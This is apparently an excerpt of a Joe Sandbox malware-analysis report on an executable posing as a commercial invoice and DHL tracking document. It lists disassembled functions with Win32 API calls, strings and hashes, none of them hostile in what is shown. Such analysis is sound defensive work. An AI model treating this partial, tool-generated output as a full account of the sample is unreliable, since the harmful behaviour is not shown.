SendMessageW.USER32(?,00001061,?,0000000F), ref: 004939F4

Strings

SysListView32, xrefs: 004938F7

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 3ecd89782b7b5123188dbc6cfaf20b30c3abe0ff2b40ad5abd01ade34b70e5ea
Instruction ID: 013bb0722e0a1e7de6f290400708e6d2b920f730889d4b40bdacc0df7213a591
Opcode Fuzzy Hash: 3ecd89782b7b5123188dbc6cfaf20b30c3abe0ff2b40ad5abd01ade34b70e5ea
Instruction Fuzzy Hash: 1B419271A00218ABDF21DF64CC45FEA7BA9EB09354F10053BF954A7291D7799D808B98

Function 0046BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0046BCFD
IsMenu.USER32(00000000), ref: 0046BD1D
CreatePopupMenu.USER32 ref: 0046BD53
GetMenuItemCount.USER32(00C96118), ref: 0046BDA4
InsertMenuItemW.USER32(00C96118,?,00000001,00000030), ref: 0046BDCC

Strings

2, xrefs: 0046BD37
0, xrefs: 0046BCA8

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: fc23f78126ae8f3c17f335ed2ee0a4bbf63056aa4ee57b4678f8e2eb18c6fe53
Instruction ID: d2fe6743287e205c4ec621a8d721353cc11330f79cd585bc8e40e3a4eb8813f7
Opcode Fuzzy Hash: fc23f78126ae8f3c17f335ed2ee0a4bbf63056aa4ee57b4678f8e2eb18c6fe53
Instruction Fuzzy Hash: 7151C070600205ABDB11CFA9C8C4BAEBBF9EF45314F14412BE441DB291E7789981CB9B

Function 00422D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00422D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00422D53
_ValidateLocalCookies.LIBCMT ref: 00422DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00422E0C
_ValidateLocalCookies.LIBCMT ref: 00422E61

Strings

&HB, xrefs: 00422DFE, 00422E07, 00422E18
csm, xrefs: 00422DF6

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &HB$csm
API String ID: 1170836740-430194703
Opcode ID: 17a0005c6933a5144f9f8d8205935f8b0f75e75d15b2970b1a508403548e2111
Instruction ID: 4818aa0c625e2817a00b2cc851399fe9171d4dad415be29509831b30a559dab0
Opcode Fuzzy Hash: 17a0005c6933a5144f9f8d8205935f8b0f75e75d15b2970b1a508403548e2111
Instruction Fuzzy Hash: CE41F734F00228ABCF10DF69D944A9FBBB0BF45328F94815BE8145B352D7799A01CB94

Function 0046C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0046C913

Strings

info, xrefs: 0046C8B4
question, xrefs: 0046C8CC
blank, xrefs: 0046C895
warning, xrefs: 0046C8FC
stop, xrefs: 0046C8E4

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 2f3f6c772facaa6c2e88fc6b5b5e819e8bf7cb92eb527ae9d8b990f435669e35
Instruction ID: bb0d5d1ca0b7b7549bd628b7d457241fa207a64defe98c7702ddfa90c16ab9c0
Opcode Fuzzy Hash: 2f3f6c772facaa6c2e88fc6b5b5e819e8bf7cb92eb527ae9d8b990f435669e35
Instruction Fuzzy Hash: CA115B75789306BAA704AB10ACC2EBB239CCF15318B60003FF444A6282FB7C5D0052AE

Function 0046ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0046ED2A
_wcslen.LIBCMT ref: 0046ED3B
_wcslen.LIBCMT ref: 0046ED79
_wcslen.LIBCMT ref: 0046EDAF
_wcslen.LIBCMT ref: 0046EDDF
_wcslen.LIBCMT ref: 0046EDEF
_wcslen.LIBCMT ref: 0046EE2B
_wcslen.LIBCMT ref: 0046EE5A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: a420661d227a2c7768e02056e3bc6b955d7d94d0c3ec397bd8422308fd40afbd
Instruction ID: 4f8958e37ec1e81abdee0eef7bf6fc4addebcbdb16e8410d4e2bf860027f3b8a
Opcode Fuzzy Hash: a420661d227a2c7768e02056e3bc6b955d7d94d0c3ec397bd8422308fd40afbd
Instruction Fuzzy Hash: 9241A465D10128B5CB11EBB6D88A9CF77A8AF45310F904467E514E3161FB38E245C3AE

Function 0041F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0045682C,00000004,00000000,00000000), ref: 0041F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0045682C,00000004,00000000,00000000), ref: 0045F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0045682C,00000004,00000000,00000000), ref: 0045F454

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 4097de2063e2d903274c254244b3b6af1c99affe0ef641e9fa623c96fc32751a
Instruction ID: 10a6b06008afa1e2328434a854a09bd47367bc282bad862656ef31b7fbd0d56e
Opcode Fuzzy Hash: 4097de2063e2d903274c254244b3b6af1c99affe0ef641e9fa623c96fc32751a
Instruction Fuzzy Hash: 4D415FB0118640BAD734AB29C8887AB7B916B56325F58443FE44752761C63D98CFCB1E

Function 00492D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00492D1B
GetDC.USER32(00000000), ref: 00492D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00492D2E
ReleaseDC.USER32(00000000,00000000), ref: 00492D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00492D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00492D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00495A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00492DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00492DE1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 40775b777a9ed974af0fa6005f63a35fd003ccd795d9b9edb304a55b101f72ec
Instruction ID: c014384b98ff002bb39f8f228335d4e310598615e16fec949adeca6e26dd830f
Opcode Fuzzy Hash: 40775b777a9ed974af0fa6005f63a35fd003ccd795d9b9edb304a55b101f72ec
Instruction Fuzzy Hash: 4F316B72201214BBEF118F508C8AFEB3FA9EB19755F044076FE089A291C6B59C51CBA8

Function 00465622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00465637
_memcmp.LIBVCRUNTIME ref: 00465659
_memcmp.LIBVCRUNTIME ref: 00465671
_memcmp.LIBVCRUNTIME ref: 00465684
_memcmp.LIBVCRUNTIME ref: 0046569E
_memcmp.LIBVCRUNTIME ref: 004656B1
_memcmp.LIBVCRUNTIME ref: 004656C9
_memcmp.LIBVCRUNTIME ref: 004656E4

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f574267dd208e8414daf43423a911871f3c4da1cc2f54f3bbf8c3215cc0c872d
Instruction ID: e0219283109e526c755bfb0067b1299e64ae9441197aa3b019e1f6381a1da279
Opcode Fuzzy Hash: f574267dd208e8414daf43423a911871f3c4da1cc2f54f3bbf8c3215cc0c872d
Instruction Fuzzy Hash: 2D219561740A197BE6149521DD82FBB235DAE20399F944037FD089AA81F72CED25C1AF

Function 00484FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0048502E, 00485383
Not an Object type, xrefs: 00485007

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 04f164943aaf497c4b66bc9eafae9d181c66bb72785b5d391fc7d77ea212bbc8
Instruction ID: 1bf2488d1df435c699735f151444ac7b81e52084c40feb6cc3c7295a9c6c286a
Opcode Fuzzy Hash: 04f164943aaf497c4b66bc9eafae9d181c66bb72785b5d391fc7d77ea212bbc8
Instruction Fuzzy Hash: DED1D375A0060A9FDF10EFA8C884BAEB7B5BF48344F14886AE915EB380E774DD45CB54

Function 00441522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,004417FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 004415CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00441651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,004417FB,?,004417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004416E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004416FB

Part of subcall function 00433820: RtlAllocateHeap.NTDLL(00000000,?,004D1444,?,0041FDF5,?,?,0040A976,00000010,004D1440,004013FC,?,004013C6,?,00401129), ref: 00433852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00441777
__freea.LIBCMT ref: 004417A2
__freea.LIBCMT ref: 004417AE

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 0580935182319acf0986065053460dd0c5db5f7d2393057fb5d76a01597ff8fa
Instruction ID: 61043d0715f82f9c83f994bef9256619e617f3eba19e56cad677481ceaf8c2f0
Opcode Fuzzy Hash: 0580935182319acf0986065053460dd0c5db5f7d2393057fb5d76a01597ff8fa
Instruction Fuzzy Hash: 8891B271E00216ABEB208E64C881EEF7BF59F49354F18466BE805E7261D73DDC81CB68

Function 00484523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00484648
VariantInit.OLEAUT32(?), ref: 00484749
VariantClear.OLEAUT32(?), ref: 00484753
VariantClear.OLEAUT32(?), ref: 004847B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 004845D8, 00484706, 004847BE
Incorrect Object type in FOR..IN loop, xrefs: 0048472C

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: ac140e23675bb14214067e9e22e9b859db925955238518eeda0ebec4d2ee67ef
Instruction ID: 302d8e85ba75092837d4fbd64c786191f5a26cbf20250f77e8306e51f43bb105
Opcode Fuzzy Hash: ac140e23675bb14214067e9e22e9b859db925955238518eeda0ebec4d2ee67ef
Instruction Fuzzy Hash: 9E917371A00216AFDF20DFA5C844FAF7BB8EF85714F10895AF505AB280D7789945CFA8

Function 00471187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0047125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00471284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 004712A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004712D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0047135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004713C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00471430

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 7f72667380810bfe83ac03ce95753f0bdbed7838e2ae56f3509da28350e74c75
Instruction ID: eeb8a1cab3dcaf25cce9ef12d76c697ee4238524dd65f2955dc5ebd01ffaeda3
Opcode Fuzzy Hash: 7f72667380810bfe83ac03ce95753f0bdbed7838e2ae56f3509da28350e74c75
Instruction Fuzzy Hash: EE91F471A00218AFDB10DF99C884BFE77B5FF45314F14806BE905E72A2D778A941CB99

Function 0041948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 4f211f78bc30ad95b27f5cb4d7f60e07ad57b5bd2944a6bdef5f2fc8962bcbbb
Instruction ID: 5e354bf8666d2df3c288563dc956d0438b18d1603999bdd2ec6b7625199c5dc1
Opcode Fuzzy Hash: 4f211f78bc30ad95b27f5cb4d7f60e07ad57b5bd2944a6bdef5f2fc8962bcbbb
Instruction Fuzzy Hash: BB911771904219EFCB10CFA9C884AEEBBB9FF49320F14455AE915B7251D378AD82CB64

Function 00483947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0048396B
CharUpperBuffW.USER32(?,?), ref: 00483A7A
_wcslen.LIBCMT ref: 00483A8A
VariantClear.OLEAUT32(?), ref: 00483C1F

Part of subcall function 00470CDF: VariantInit.OLEAUT32(00000000), ref: 00470D1F
Part of subcall function 00470CDF: VariantCopy.OLEAUT32(?,?), ref: 00470D28
Part of subcall function 00470CDF: VariantClear.OLEAUT32(?), ref: 00470D34

Strings

Incorrect Parameter format, xrefs: 004839A6, 00483BA1
AUTOIT.ERROR, xrefs: 00483A80, 00483A85

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 690b30ce57c808038e774699821501690e8f8ce31fc8d7f726ea9f59a978559d
Instruction ID: 5ee05177af821d28c0339942000487e4f738c6e6fb7a355de418583010d04a9f
Opcode Fuzzy Hash: 690b30ce57c808038e774699821501690e8f8ce31fc8d7f726ea9f59a978559d
Instruction Fuzzy Hash: E89149756083059FC704EF25C48096EB7E4BF88719F14886EF88997351DB38EE46CB96

Function 00484BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0046000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0045FF41,80070057,?,?,?,0046035E), ref: 0046002B
Part of subcall function 0046000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0045FF41,80070057,?,?), ref: 00460046
Part of subcall function 0046000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0045FF41,80070057,?,?), ref: 00460054
Part of subcall function 0046000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0045FF41,80070057,?), ref: 00460064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00484C51
_wcslen.LIBCMT ref: 00484D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00484DCF
CoTaskMemFree.OLE32(?), ref: 00484DDA

Strings

NULL Pointer assignment, xrefs: 00484E23, 00484E52

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 805fa7f04c465343740e9c92e99c2b8ea71e5eb3428725b1344ec4acb19ea1be
Instruction ID: 34672b3efb296b58192750c7ded87718e57233607254ae5501f83e8b5ffc5208
Opcode Fuzzy Hash: 805fa7f04c465343740e9c92e99c2b8ea71e5eb3428725b1344ec4acb19ea1be
Instruction Fuzzy Hash: 6D912871D00219AFDF10EFA5D880AEEB7B8BF48304F10856AE915B7281EB385A45CF64

Function 004920FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00492183
GetMenuItemCount.USER32(00000000), ref: 004921B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004921DD
_wcslen.LIBCMT ref: 00492213
GetMenuItemID.USER32(?,?), ref: 0049224D
GetSubMenu.USER32(?,?), ref: 0049225B

Part of subcall function 00463A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00463A57
Part of subcall function 00463A3D: GetCurrentThreadId.KERNEL32 ref: 00463A5E
Part of subcall function 00463A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004625B3), ref: 00463A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004922E3

Part of subcall function 0046E97B: Sleep.KERNEL32 ref: 0046E9F3

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 8d4e3de8c2f1fbb50e88d52abeb75c2742586b86a19a2b679d60c6708a1c4693
